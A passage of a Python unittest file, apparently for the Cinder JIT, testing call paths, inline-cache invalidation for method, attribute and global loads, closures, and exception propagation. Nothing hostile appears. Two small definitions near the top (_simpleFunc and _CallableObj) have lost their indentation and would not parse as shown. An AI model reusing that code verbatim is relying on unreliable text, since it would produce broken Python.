        rebuilt.__kwdefaults__ = func.__kwdefaults__
        return rebuilt
    return decorator
@unittest.failUnlessJITCompiled
def get_meaning_of_life(obj):
    # Single-site method call used by the tests below to prime and then
    # invalidate the LOAD_METHOD inline cache.
    return obj.meaning_of_life()
def nothing():
    """Stand-in attribute (returns 0) used to shadow methods in the
    cache-invalidation tests."""
    return 0
def _simpleFunc(a, b):
return a, b
class _CallableObj:
def __call__(self, a, b):
return self, a, b
class CallKWArgsTests(unittest.TestCase):
    """Keyword-argument call paths under the JIT: plain functions, static
    methods, bound methods, callable objects and C functions."""
    @unittest.failUnlessJITCompiled
    def test_call_basic_function_pos_and_kw(self):
        r = _simpleFunc(1, b=2)
        self.assertEqual(r, (1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_basic_function_kw_only(self):
        # keyword order must not matter
        r = _simpleFunc(b=2, a=1)
        self.assertEqual(r, (1, 2))
        r = _simpleFunc(a=1, b=2)
        self.assertEqual(r, (1, 2))
    @staticmethod
    def _f1(a, b):
        return a, b
    @unittest.failUnlessJITCompiled
    def test_call_class_static_pos_and_kw(self):
        r = CallKWArgsTests._f1(1, b=2)
        self.assertEqual(r, (1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_class_static_kw_only(self):
        r = CallKWArgsTests._f1(b=2, a=1)
        self.assertEqual(r, (1, 2))
    def _f2(self, a, b):
        return self, a, b
    @unittest.failUnlessJITCompiled
    def test_call_method_kw_and_pos(self):
        r = self._f2(1, b=2)
        self.assertEqual(r, (self, 1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_method_kw_only(self):
        r = self._f2(b=2, a=1)
        self.assertEqual(r, (self, 1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_bound_method_kw_and_pos(self):
        f = self._f2
        r = f(1, b=2)
        self.assertEqual(r, (self, 1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_bound_method_kw_only(self):
        f = self._f2
        r = f(b=2, a=1)
        self.assertEqual(r, (self, 1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_obj_kw_and_pos(self):
        o = _CallableObj()
        r = o(1, b=2)
        self.assertEqual(r, (o, 1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_obj_kw_only(self):
        o = _CallableObj()
        r = o(b=2, a=1)
        self.assertEqual(r, (o, 1, 2))
    @unittest.failUnlessJITCompiled
    def test_call_c_func(self):
        # keyword call into a builtin (C) function
        self.assertEqual(__import__("sys", globals=None), sys)
class CallExTests(unittest.TestCase):
    """CALL_FUNCTION_EX paths: *args / **kwargs unpacking under the JIT."""

    @unittest.failUnlessJITCompiled
    def test_call_dynamic_kw_dict(self):
        r = _simpleFunc(**{"b": 2, "a": 1})
        self.assertEqual(r, (1, 2))

    class _DummyMapping:
        # Minimal non-dict mapping: just enough protocol for ** unpacking.
        def keys(self):
            return ("a", "b")

        def __getitem__(self, k):
            return {"a": 1, "b": 2}[k]

    @unittest.failUnlessJITCompiled
    def test_call_dynamic_kw_mapping(self):
        # BUGFIX: this method was also named test_call_dynamic_kw_dict,
        # silently shadowing the dict-literal variant above so only one of
        # the two ever ran.
        r = _simpleFunc(**CallExTests._DummyMapping())
        self.assertEqual(r, (1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_dynamic_pos_tuple(self):
        r = _simpleFunc(*(1, 2))
        self.assertEqual(r, (1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_dynamic_pos_list(self):
        r = _simpleFunc(*[1, 2])
        self.assertEqual(r, (1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_dynamic_pos_and_kw(self):
        r = _simpleFunc(*(1,), **{"b": 2})
        self.assertEqual(r, (1, 2))

    @unittest.failUnlessJITCompiled
    def _doCall(self, args, kwargs):
        return _simpleFunc(*args, **kwargs)

    def test_invalid_kw_type(self):
        err = r"_simpleFunc\(\) argument after \*\* must be a mapping, not int"
        with self.assertRaisesRegex(TypeError, err):
            self._doCall([], 1)

    @unittest.skipUnlessCinderJITEnabled("Exposes interpreter reference leak")
    def test_invalid_pos_type(self):
        err = r"_simpleFunc\(\) argument after \* must be an iterable, not int"
        with self.assertRaisesRegex(TypeError, err):
            self._doCall(1, {})

    @staticmethod
    def _f1(a, b):
        return a, b

    @unittest.failUnlessJITCompiled
    def test_call_class_static_pos_and_kw(self):
        r = CallExTests._f1(*(1,), **{"b": 2})
        self.assertEqual(r, (1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_class_static_kw_only(self):
        # NOTE(review): reaches into CallKWArgsTests._f1 rather than
        # CallExTests._f1 — both behave identically, but this looks like a
        # copy/paste leftover; left unchanged to preserve behavior.
        r = CallKWArgsTests._f1(**{"b": 2, "a": 1})
        self.assertEqual(r, (1, 2))

    def _f2(self, a, b):
        return self, a, b

    @unittest.failUnlessJITCompiled
    def test_call_method_kw_and_pos(self):
        r = self._f2(*(1,), **{"b": 2})
        self.assertEqual(r, (self, 1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_method_kw_only(self):
        r = self._f2(**{"b": 2, "a": 1})
        self.assertEqual(r, (self, 1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_bound_method_kw_and_pos(self):
        f = self._f2
        r = f(*(1,), **{"b": 2})
        self.assertEqual(r, (self, 1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_bound_method_kw_only(self):
        f = self._f2
        r = f(**{"b": 2, "a": 1})
        self.assertEqual(r, (self, 1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_obj_kw_and_pos(self):
        o = _CallableObj()
        r = o(*(1,), **{"b": 2})
        self.assertEqual(r, (o, 1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_obj_kw_only(self):
        o = _CallableObj()
        r = o(**{"b": 2, "a": 1})
        self.assertEqual(r, (o, 1, 2))

    @unittest.failUnlessJITCompiled
    def test_call_c_func_pos_only(self):
        self.assertEqual(len(*([2],)), 1)

    @unittest.failUnlessJITCompiled
    def test_call_c_func_pos_and_kw(self):
        self.assertEqual(__import__(*("sys",), **{"globals": None}), sys)
class LoadMethodCacheTests(unittest.TestCase):
    """Invalidation of LOAD_METHOD inline caches.

    Each test primes the cache via get_meaning_of_life() (one uncached call,
    one cached call), then mutates the type, its bases or the instance in a
    way that must invalidate the cached lookup.
    """
    def test_type_modified(self):
        class Oracle:
            def meaning_of_life(self):
                return 42
        obj = Oracle()
        # Uncached
        self.assertEqual(get_meaning_of_life(obj), 42)
        # Cached
        self.assertEqual(get_meaning_of_life(obj), 42)
        # Invalidate cache
        def new_meaning_of_life(x):
            return 0
        Oracle.meaning_of_life = new_meaning_of_life
        self.assertEqual(get_meaning_of_life(obj), 0)
    def test_base_type_modified(self):
        class Base:
            def meaning_of_life(self):
                return 42
        class Derived(Base):
            pass
        obj = Derived()
        # Uncached
        self.assertEqual(get_meaning_of_life(obj), 42)
        # Cached
        self.assertEqual(get_meaning_of_life(obj), 42)
        # Mutate Base. Should propagate to Derived and invalidate the cache.
        def new_meaning_of_life(x):
            return 0
        Base.meaning_of_life = new_meaning_of_life
        self.assertEqual(get_meaning_of_life(obj), 0)
    def test_second_base_type_modified(self):
        class Base1:
            pass
        class Base2:
            def meaning_of_life(self):
                return 42
        class Derived(Base1, Base2):
            pass
        obj = Derived()
        # Uncached
        self.assertEqual(get_meaning_of_life(obj), 42)
        # Cached
        self.assertEqual(get_meaning_of_life(obj), 42)
        # Mutate first base. Should propagate to Derived and invalidate the cache.
        def new_meaning_of_life(x):
            return 0
        Base1.meaning_of_life = new_meaning_of_life
        self.assertEqual(get_meaning_of_life(obj), 0)
    def test_type_dunder_bases_reassigned(self):
        class Base1:
            pass
        class Derived(Base1):
            pass
        # No shadowing happens between obj{1,2} and Derived, thus the now
        # shadowing flag should be set
        obj1 = Derived()
        obj2 = Derived()
        obj2.meaning_of_life = nothing
        # Now obj2.meaning_of_life shadows Base.meaning_of_life
        class Base2:
            def meaning_of_life(self):
                return 42
        Derived.__bases__ = (Base2,)
        # Attempt to prime the cache
        self.assertEqual(get_meaning_of_life(obj1), 42)
        self.assertEqual(get_meaning_of_life(obj1), 42)
        # If flag is not correctly cleared when Derived.__bases__ is
        # assigned we will end up returning 42
        self.assertEqual(get_meaning_of_life(obj2), 0)
    def _make_obj(self):
        # Helper: return an instance whose meaning_of_life() lookup has
        # already been primed into the cache (two calls).
        class Oracle:
            def meaning_of_life(self):
                return 42
        obj = Oracle()
        # Uncached
        self.assertEqual(get_meaning_of_life(obj), 42)
        # Cached
        self.assertEqual(get_meaning_of_life(obj), 42)
        return obj
    def test_instance_assignment(self):
        obj = self._make_obj()
        # instance attribute shadows the cached type method
        obj.meaning_of_life = nothing
        self.assertEqual(get_meaning_of_life(obj), 0)
    def test_instance_dict_assignment(self):
        obj = self._make_obj()
        # writing through __dict__ directly must also invalidate
        obj.__dict__["meaning_of_life"] = nothing
        self.assertEqual(get_meaning_of_life(obj), 0)
    def test_instance_dict_replacement(self):
        obj = self._make_obj()
        # replacing the whole instance dict must also invalidate
        obj.__dict__ = {"meaning_of_life": nothing}
        self.assertEqual(get_meaning_of_life(obj), 0)
    def test_instance_dunder_class_assignment(self):
        obj = self._make_obj()
        class Other:
            pass
        other = Other()
        other.meaning_of_life = nothing
        # reassigning __class__ brings the primed type, but the instance
        # attribute must still win
        other.__class__ = obj.__class__
        self.assertEqual(get_meaning_of_life(other), 0)
    def test_shadowcode_setattr(self):
        """sets attribute via shadow byte code, it should update the
        type bit for instance shadowing"""
        obj = self._make_obj()
        obj.foo = 42
        obj1 = type(obj)()
        obj1.other = 100
        def f(obj, set):
            if set:
                obj.meaning_of_life = nothing
            yield 42
        # warm the shadow-bytecode path before the shadowing store
        for i in range(100):
            list(f(obj, False))
        list(f(obj, True))
        self.assertEqual(get_meaning_of_life(obj), 0)
    def test_shadowcode_setattr_split(self):
        """sets attribute via shadow byte code on a split dict,
        it should update the type bit for instance shadowing"""
        obj = self._make_obj()
        def f(obj, set):
            if set:
                obj.meaning_of_life = nothing
            yield 42
        for i in range(100):
            list(f(obj, False))
        list(f(obj, True))
        self.assertEqual(get_meaning_of_life(obj), 0)
@unittest.failUnlessJITCompiled
def get_foo(obj):
    # Single-site attribute load used to exercise the LOAD_ATTR inline cache.
    return obj.foo
class LoadAttrCacheTests(unittest.TestCase):
    """Invalidation of LOAD_ATTR inline caches when instance dicts are
    reassigned, mutated, or switch between split and combined layouts."""
    def test_dict_reassigned(self):
        class Base:
            def __init__(self, x):
                self.foo = x
        obj1 = Base(100)
        obj2 = Base(200)
        # uncached
        self.assertEqual(get_foo(obj1), 100)
        # cached
        self.assertEqual(get_foo(obj1), 100)
        self.assertEqual(get_foo(obj2), 200)
        # replacing the whole __dict__ must be picked up by the cache
        obj1.__dict__ = {"foo": 200}
        self.assertEqual(get_foo(obj1), 200)
        self.assertEqual(get_foo(obj2), 200)
    def test_dict_mutated(self):
        class Base:
            def __init__(self, foo):
                self.foo = foo
        obj = Base(100)
        # uncached
        self.assertEqual(get_foo(obj), 100)
        # cached
        self.assertEqual(get_foo(obj), 100)
        # direct __dict__ mutation must be picked up by the cache
        obj.__dict__["foo"] = 200
        self.assertEqual(get_foo(obj), 200)
    def test_dict_resplit(self):
        # This causes one resize of the instance dictionary, which should cause
        # it to go from split -> combined -> split.
        class Base:
            def __init__(self):
                self.foo, self.a, self.b = 100, 200, 300
                self.c, self.d, self.e = 400, 500, 600
        obj = Base()
        # uncached
        self.assertEqual(get_foo(obj), 100)
        # cached
        self.assertEqual(get_foo(obj), 100)
        obj.foo = 800
        self.assertEqual(get_foo(obj), 800)
    def test_dict_combined(self):
        class Base:
            def __init__(self, foo):
                self.foo = foo
        obj1 = Base(100)
        # uncached
        self.assertEqual(get_foo(obj1), 100)
        # cached
        self.assertEqual(get_foo(obj1), 100)
        obj2 = Base(200)
        obj2.bar = 300
        # At this point the dictionary should still be split
        obj3 = Base(400)
        obj3.baz = 500
        # Assigning 'baz' should clear the cached key object for Base and leave
        # existing instance dicts in the following states:
        #
        #   obj1.__dict__ - Split
        #   obj2.__dict__ - Split
        #   obj3.__dict__ - Combined
        obj4 = Base(600)
        self.assertEqual(get_foo(obj1), 100)
        self.assertEqual(get_foo(obj2), 200)
        self.assertEqual(get_foo(obj3), 400)
        self.assertEqual(get_foo(obj4), 600)
class SetNonDataDescrAttrTests(unittest.TestCase):
    """STORE_ATTR caching when a non-data descriptor later grows __set__
    (i.e. becomes a data descriptor) through its type."""
    @unittest.failUnlessJITCompiled
    def set_foo(self, obj, val):
        # single-site store used to prime the STORE_ATTR inline cache
        obj.foo = val
    def setUp(self):
        # Descr has only __get__, so it starts out as a NON-data descriptor:
        # instance stores go straight to obj.__dict__.
        class Descr:
            def __init__(self, name):
                self.name = name
            def __get__(self, obj, typ):
                return obj.__dict__[self.name]
        self.descr_type = Descr
        self.descr = Descr("foo")
        class Test:
            foo = self.descr
        self.obj = Test()
    def test_set_when_changed_to_data_descr(self):
        # uncached
        self.set_foo(self.obj, 100)
        self.assertEqual(self.obj.foo, 100)
        # cached
        self.set_foo(self.obj, 200)
        self.assertEqual(self.obj.foo, 200)
        # convert into a data descriptor
        def setter(self, obj, val):
            self.invoked = True
        self.descr.__class__.__set__ = setter
        # setter doesn't modify the object, so obj.foo shouldn't change
        self.set_foo(self.obj, 300)
        self.assertEqual(self.obj.foo, 200)
        self.assertTrue(self.descr.invoked)
class GetSetNonDataDescrAttrTests(unittest.TestCase):
    """LOAD_ATTR caching around a non-data descriptor that can later turn
    into a data descriptor or into a plain class attribute."""
    @unittest.failUnlessJITCompiled
    def get_foo(self, obj):
        # single-site load used to prime the LOAD_ATTR inline cache
        return obj.foo
    def setUp(self):
        # NonDataDescr.__get__ counts invocations and (optionally) writes a
        # shadowing entry into the instance dict, which later short-circuits
        # the descriptor.
        class NonDataDescr:
            def __init__(self, val):
                self.val = val
                self.invoked_count = 0
                self.set_dict = True
            def __get__(self, obj, typ):
                self.invoked_count += 1
                if self.set_dict:
                    obj.__dict__["foo"] = self.val
                return self.val
        self.descr_type = NonDataDescr
        self.descr = NonDataDescr("testing 123")
        class Test:
            foo = self.descr
        self.obj = Test()
    def test_get(self):
        # uncached
        self.assertEqual(self.get_foo(self.obj), "testing 123")
        self.assertEqual(self.descr.invoked_count, 1)
        # cached; __get__ should not be invoked as there is now a shadowing
        # entry in obj's __dict__
        self.assertEqual(self.get_foo(self.obj), "testing 123")
        self.assertEqual(self.descr.invoked_count, 1)
        # cached; __get__ should be invoked as there is not a shadowing
        # entry in obj2's __dict__
        obj2 = self.obj.__class__()
        self.assertEqual(self.get_foo(obj2), "testing 123")
        self.assertEqual(self.descr.invoked_count, 2)
    def test_get_when_changed_to_data_descr(self):
        # uncached
        self.assertEqual(self.get_foo(self.obj), "testing 123")
        self.assertEqual(self.descr.invoked_count, 1)
        # cached; __get__ should not be invoked as there is now a shadowing
        # entry in obj's __dict__
        self.assertEqual(self.get_foo(self.obj), "testing 123")
        self.assertEqual(self.descr.invoked_count, 1)
        # Convert descriptor into a data descr by modifying its type
        def setter(self, obj, val):
            pass
        self.descr.__class__.__set__ = setter
        # cached; __get__ should be invoked as self.descr is now a data descr
        self.assertEqual(self.get_foo(self.obj), "testing 123")
        self.assertEqual(self.descr.invoked_count, 2)
    def test_get_when_changed_to_classvar(self):
        # Don't set anything in the instance dict when the descriptor is
        # invoked. This ensures we don't early exit and bottom out into the
        # descriptor case.
        self.descr.set_dict = False
        # uncached
        self.assertEqual(self.get_foo(self.obj), "testing 123")
        self.assertEqual(self.descr.invoked_count, 1)
        # cached
        self.assertEqual(self.get_foo(self.obj), "testing 123")
        self.assertEqual(self.descr.invoked_count, 2)
        # Convert descriptor into a plain old value by changing the
        # descriptor's type
        class ClassVar:
            pass
        self.descr.__class__ = ClassVar
        # Cached; type check on descriptor's type should fail
        self.assertIs(self.get_foo(self.obj), self.descr)
        self.assertEqual(self.descr.invoked_count, 2)
@unittest.failUnlessJITCompiled
def set_foo(x, val):
    # Single-site attribute store used to exercise the STORE_ATTR inline cache.
    x.foo = val
class DataDescr:
    """Data descriptor whose __set__ only records that it was invoked."""

    def __init__(self, val):
        self.val = val
        self.invoked = False

    def __get__(self, obj, typ):
        return self.val

    def __set__(self, obj, val):
        # Deliberately does not store `val`: the tests assert the old value
        # survives while `invoked` flips to True.
        self.invoked = True
class StoreAttrCacheTests(unittest.TestCase):
    """Invalidation of STORE_ATTR inline caches: data descriptors attached
    after priming, and split/combined instance-dict transitions."""
    def test_data_descr_attached(self):
        class Base:
            def __init__(self, x):
                self.foo = x
        obj = Base(100)
        # Uncached
        set_foo(obj, 200)
        # Cached
        set_foo(obj, 200)
        self.assertEqual(obj.foo, 200)
        # Attaching a data descriptor to the type should invalidate the cache
        # and prevent future caching
        descr = DataDescr(300)
        Base.foo = descr
        set_foo(obj, 200)
        self.assertEqual(obj.foo, 300)
        self.assertTrue(descr.invoked)
        # a second store must keep hitting the descriptor, not the cache
        descr.invoked = False
        set_foo(obj, 400)
        self.assertEqual(obj.foo, 300)
        self.assertTrue(descr.invoked)
    def test_swap_split_dict_with_combined(self):
        class Base:
            def __init__(self, x):
                self.foo = x
        obj = Base(100)
        # Uncached
        set_foo(obj, 200)
        # Cached
        set_foo(obj, 200)
        self.assertEqual(obj.foo, 200)
        # At this point obj should have a split dictionary for attribute
        # storage. We're going to swap it out with a combined dictionary
        # and verify that attribute stores still work as expected.
        d = {"foo": 300}
        obj.__dict__ = d
        set_foo(obj, 400)
        self.assertEqual(obj.foo, 400)
        self.assertEqual(d["foo"], 400)
    def test_swap_combined_dict_with_split(self):
        class Base:
            def __init__(self, x):
                self.foo = x
        # Swap out obj's dict with a combined dictionary. Priming the IC
        # for set_foo will result in it expecting a combined dictionary
        # for instances of type Base.
        obj = Base(100)
        obj.__dict__ = {"foo": 100}
        # Uncached
        set_foo(obj, 200)
        # Cached
        set_foo(obj, 200)
        self.assertEqual(obj.foo, 200)
        # obj2 should have a split dictionary used for attribute storage
        # which will result in a cache miss in the IC
        obj2 = Base(300)
        set_foo(obj2, 400)
        self.assertEqual(obj2.foo, 400)
    def test_split_dict_no_slot(self):
        class Base:
            pass
        # obj is a split dict
        obj = Base()
        obj.quox = 42
        # obj1 is no longer split, but the assignment
        # didn't go through _PyObjectDict_SetItem, so the type
        # still has a valid CACHED_KEYS
        obj1 = Base()
        obj1.__dict__["other"] = 100
        # now we try setting foo on obj1, do the set on obj1
        # while setting up the cache, but attempt to create a cache
        # with an invalid val_offset because there's no foo
        # entry in the cached keys.
        set_foo(obj1, 300)
        self.assertEqual(obj1.foo, 300)
        set_foo(obj, 400)
        self.assertEqual(obj1.foo, 300)
class LoadGlobalCacheTests(unittest.TestCase):
    """Tests for JIT caching of global loads (LOAD_GLOBAL), including
    invalidation when module globals or builtins are mutated, shadowed,
    or made unwatchable (non-string keys)."""

    def setUp(self):
        # Start each test with neither name bound at module scope so the
        # globals -> builtins fallback is exercised from a known state.
        global license, a_global
        try:
            del license
        except NameError:
            pass
        try:
            del a_global
        except NameError:
            pass

    @staticmethod
    def set_global(value):
        global a_global
        a_global = value

    @staticmethod
    @unittest.failUnlessJITCompiled
    def get_global():
        # JIT-compiled reader; its LOAD_GLOBAL cache is the unit under test.
        return a_global

    @staticmethod
    def del_global():
        global a_global
        del a_global

    @staticmethod
    def set_license(value):
        # `license` shadows a real builtin (site.license).
        global license
        license = value

    @staticmethod
    def del_license():
        global license
        del license

    @unittest.failUnlessJITCompiled
    def test_simple(self):
        global a_global
        self.set_global(123)
        self.assertEqual(a_global, 123)
        self.set_global(456)
        self.assertEqual(a_global, 456)

    @unittest.failUnlessJITCompiled
    def test_shadow_builtin(self):
        # Shadowing and then un-shadowing a real builtin must be
        # reflected by the cached load.
        self.assertIs(license, builtins.license)
        self.set_license(0xDEADBEEF)
        self.assertIs(license, 0xDEADBEEF)
        self.del_license()
        self.assertIs(license, builtins.license)

    @unittest.failUnlessJITCompiled
    def test_shadow_fake_builtin(self):
        # A name injected into builtins at runtime, then shadowed by a
        # module global, then unshadowed, then removed again.
        self.assertRaises(NameError, self.get_global)
        builtins.a_global = "poke"
        self.assertEqual(a_global, "poke")
        self.set_global("override poke")
        self.assertEqual(a_global, "override poke")
        self.del_global()
        self.assertEqual(a_global, "poke")
        # We don't support DELETE_ATTR yet.
        delattr(builtins, "a_global")
        self.assertRaises(NameError, self.get_global)

    class prefix_str(str):
        # A str subclass whose hash/equality depend on extra state, used
        # to sneak a "weird" key into a watched globals dict.
        def __new__(ty, prefix, value):
            s = super().__new__(ty, value)
            s.prefix = prefix
            return s

        def __hash__(self):
            return hash(self.prefix + self)

        def __eq__(self, other):
            return (self.prefix + self) == other

    @unittest.failUnlessJITCompiled
    def test_weird_key_in_globals(self):
        global a_global
        self.assertRaises(NameError, self.get_global)
        # Key compares/hashes equal to "a_global" but is not a plain str.
        globals()[self.prefix_str("a_glo", "bal")] = "a value"
        self.assertEqual(a_global, "a value")
        self.assertEqual(self.get_global(), "a value")

    class MyGlobals(dict):
        # dict subclass with a custom __getitem__; globals of this type
        # cannot use the fast/cached lookup path.
        def __getitem__(self, key):
            if key == "knock_knock":
                return "who's there?"
            return super().__getitem__(key)

    @with_globals(MyGlobals())
    def return_knock_knock(self):
        return knock_knock

    def test_dict_subclass_globals(self):
        self.assertEqual(self.return_knock_knock(), "who's there?")

    @unittest.failUnlessJITCompiled
    def _test_unwatch_builtins(self):
        self.set_global("hey")
        self.assertEqual(self.get_global(), "hey")
        # Non-string key makes the builtins dict unwatchable.
        builtins.__dict__[42] = 42

    def test_unwatch_builtins(self):
        try:
            self._test_unwatch_builtins()
        finally:
            del builtins.__dict__[42]

    @contextmanager
    def temp_sys_path(self):
        # Yield a temp dir placed at the front of sys.path, restoring
        # sys.path and sys.modules on exit so imports don't leak.
        with tempfile.TemporaryDirectory() as tmpdir:
            _orig_sys_modules = sys.modules
            sys.modules = _orig_sys_modules.copy()
            _orig_sys_path = sys.path[:]
            sys.path.insert(0, tmpdir)
            try:
                yield Path(tmpdir)
            finally:
                sys.path[:] = _orig_sys_path
                sys.modules = _orig_sys_modules

    def test_preload_side_effect_modifies_globals(self):
        # Importing tmp_b (lazily, during compilation preload) mutates
        # tmp_a.A as a side effect.
        with self.temp_sys_path() as tmp:
            (tmp / "tmp_a.py").write_text(
                dedent(
                    """
                    from __future__ import lazy_imports
                    from tmp_b import B
                    A = 1
                    def get_a():
                        return A + B
                    """
                ),
                encoding="utf8",
            )
            (tmp / "tmp_b.py").write_text(
                dedent(
                    """
                    import tmp_a
                    tmp_a.A = 2
                    B = 3
                    """
                ),
                encoding="utf8",
            )
            if cinderjit:
                cinderjit.clear_runtime_stats()
            import tmp_a

            # What happens on the first call is kinda undefined in principle
            # given lazy imports; somebody could previously have imported B
            # (not in this specific test, but in principle), or not, so the
            # first call might return 4 or 5. With JIT compilation it will
            # always return 5 because compilation will trigger the lazy import
            # and its side effect. Without the JIT it will return 4 in this
            # test, but we consider this an acceptable side effect of JIT
            # compilation because this code can't in general rely on B never
            # having previously been imported.
            tmp_a.get_a()
            # On the second call the result should undoubtedly be 5 in all
            # circumstances. Even if we compile with the wrong value for A, the
            # guard on the LoadGlobalCached will ensure we deopt and return the
            # right result.
            self.assertEqual(tmp_a.get_a(), 5)
            if cinderjit:
                self.assertTrue(cinderjit.is_jit_compiled(tmp_a.get_a))
                # The real test here is what when the value of a global changes
                # during compilation preload (as it does in this test because
                # the preload bytescan of get_a() first hits A, loads the old
                # value, then hits B, triggers the lazy import and imports
                # tmp_b, causing the value of A to change), we still have time
                # to compile with the correct (new) value and avoid compiling
                # code that will inevitably deopt, and so we should.
                stats = cinderjit.get_and_clear_runtime_stats()
                relevant_deopts = [
                    d for d in stats["deopt"] if d["normal"]["func_qualname"] == "get_a"
                ]
                self.assertEqual(relevant_deopts, [])

    def test_preload_side_effect_makes_globals_unwatchable(self):
        # Same shape as above, but tmp_b also inserts a non-string key
        # into tmp_a's globals, making them unwatchable mid-preload.
        with self.temp_sys_path() as tmp:
            (tmp / "tmp_a.py").write_text(
                dedent(
                    """
                    from __future__ import lazy_imports
                    from tmp_b import B
                    A = 1
                    def get_a():
                        return A + B
                    """
                ),
                encoding="utf8",
            )
            (tmp / "tmp_b.py").write_text(
                dedent(
                    """
                    import tmp_a
                    tmp_a.__dict__[42] = 1
                    tmp_a.A = 2
                    B = 3
                    """
                ),
                encoding="utf8",
            )
            if cinderjit:
                cinderjit.clear_runtime_stats()
            import tmp_a

            tmp_a.get_a()
            self.assertEqual(tmp_a.get_a(), 5)
            if cinderjit:
                self.assertTrue(cinderjit.is_jit_compiled(tmp_a.get_a))

    def test_preload_side_effect_makes_builtins_unwatchable(self):
        # Here the preload side effect poisons __builtins__ itself with a
        # non-string key while get_a() relies on the builtin max().
        with self.temp_sys_path() as tmp:
            (tmp / "tmp_a.py").write_text(
                dedent(
                    """
                    from __future__ import lazy_imports
                    from tmp_b import B
                    def get_a():
                        return max(1, 2) + B
                    """
                ),
                encoding="utf8",
            )
            (tmp / "tmp_b.py").write_text(
                dedent(
                    """
                    __builtins__[42] = 2
                    B = 3
                    """
                ),
                encoding="utf8",
            )
            if cinderjit:
                cinderjit.clear_runtime_stats()
            import tmp_a

            tmp_a.get_a()
            self.assertEqual(tmp_a.get_a(), 5)
            if cinderjit:
                self.assertTrue(cinderjit.is_jit_compiled(tmp_a.get_a))
class ClosureTests(unittest.TestCase):
    """JIT tests for cell variables, free variables, and nested
    function creation (MAKE_FUNCTION with closures)."""

    @unittest.failUnlessJITCompiled
    def test_cellvar(self):
        a = 1

        def foo():
            return a

        self.assertEqual(foo(), 1)

    @unittest.failUnlessJITCompiled
    def test_two_cellvars(self):
        a = 1
        b = 2

        def g():
            return a + b

        self.assertEqual(g(), 3)

    @unittest.failUnlessJITCompiled
    def test_cellvar_argument(self):
        # `self` becomes a cell because foo() closes over it.
        def foo():
            self.assertEqual(1, 1)

        foo()

    @unittest.failUnlessJITCompiled
    def test_cellvar_argument_modified(self):
        # Rebinding a cell-stored argument from the nested function must
        # be visible in the enclosing frame.
        self_ = self

        def foo():
            nonlocal self
            self = 1

        self_.assertIs(self, self_)
        foo()
        self_.assertEqual(self, 1)

    @unittest.failUnlessJITCompiled
    def _cellvar_unbound(self):
        # Reads `a` before assignment; `a` is a cell (g() closes over
        # it), so this must raise UnboundLocalError.
        b = a
        a = 1

        def g():
            return a

    def test_cellvar_unbound(self):
        with self.assertRaises(UnboundLocalError) as ctx:
            self._cellvar_unbound()
        self.assertEqual(
            str(ctx.exception), "local variable 'a' referenced before assignment"
        )

    def test_freevars(self):
        # The nested function must see the *current* value of the free
        # variable at call time, not the value at definition time.
        x = 1

        @unittest.failUnlessJITCompiled
        def nested():
            return x

        x = 2
        self.assertEqual(nested(), 2)

    def test_freevars_multiple_closures(self):
        # Each closure instance carries its own cell.
        def get_func(a):
            @unittest.failUnlessJITCompiled
            def f():
                return a

            return f

        f1 = get_func(1)
        f2 = get_func(2)
        self.assertEqual(f1(), 1)
        self.assertEqual(f2(), 2)

    def test_nested_func(self):
        @unittest.failUnlessJITCompiled
        def add(a, b):
            return a + b

        self.assertEqual(add(1, 2), 3)
        self.assertEqual(add("eh", "bee"), "ehbee")

    @staticmethod
    def make_adder(a):
        @unittest.failUnlessJITCompiled
        def add(b):
            return a + b

        return add

    def test_nested_func_with_closure(self):
        add_3 = self.make_adder(3)
        add_7 = self.make_adder(7)
        self.assertEqual(add_3(10), 13)
        self.assertEqual(add_7(12), 19)
        self.assertEqual(add_3(add_7(-100)), -90)
        with self.assertRaises(TypeError):
            add_3("ok")

    def test_nested_func_with_different_globals(self):
        # The same code object run under two different globals dicts must
        # resolve globals independently.
        @unittest.failUnlessJITCompiled
        @with_globals({"A_GLOBAL_CONSTANT": 0xDEADBEEF})
        def return_global():
            return A_GLOBAL_CONSTANT

        self.assertEqual(return_global(), 0xDEADBEEF)
        return_other_global = with_globals({"A_GLOBAL_CONSTANT": 0xFACEB00C})(
            return_global
        )
        self.assertEqual(return_other_global(), 0xFACEB00C)
        self.assertEqual(return_global(), 0xDEADBEEF)
        self.assertEqual(return_other_global(), 0xFACEB00C)

    def test_nested_func_outlives_parent(self):
        # The closure must keep its cells alive after the defining
        # function object is destroyed.
        @unittest.failUnlessJITCompiled
        def nested(x):
            @unittest.failUnlessJITCompiled
            def inner(y):
                return x + y

            return inner

        nested_ref = weakref.ref(nested)
        add_5 = nested(5)
        nested = None
        self.assertIsNone(nested_ref())
        self.assertEqual(add_5(10), 15)
class TempNameTests(unittest.TestCase):
    """Regression tests for locals whose names look like compiler
    temporaries (tmp1, v0); the exact names are the point of the test."""

    @unittest.failUnlessJITCompiled
    def _tmp_name(self, a, b):
        tmp1 = "hello"
        c = a + b
        return tmp1

    def test_tmp_name(self):
        self.assertEqual(self._tmp_name(1, 2), "hello")

    @unittest.failUnlessJITCompiled
    def test_tmp_name2(self):
        v0 = 5
        self.assertEqual(v0, 5)
class DummyContainer:
    """Container whose length query always fails.

    Used to exercise exception propagation out of implicit truthiness
    checks (e.g. ``if x:`` on an object defining only ``__len__``).
    """

    def __len__(self):
        failure = Exception("hello!")
        raise failure
class ExceptionInConditional(unittest.TestCase):
    """An exception raised while evaluating a branch condition (here via
    DummyContainer.__len__) must propagate out of JIT-compiled code."""

    @unittest.failUnlessJITCompiled
    def doit(self, x):
        if x:
            return 1
        return 2

    def test_exception_thrown_in_conditional(self):
        with self.assertRaisesRegex(Exception, "hello!"):
            self.doit(DummyContainer())
class JITCompileCrasherRegressionTests(unittest.TestCase):
    """Regression tests for code shapes that previously crashed the JIT
    compiler; the exact structure of each helper is deliberate."""

    @unittest.failUnlessJITCompiled
    def _fstring(self, flag, it1, it2):
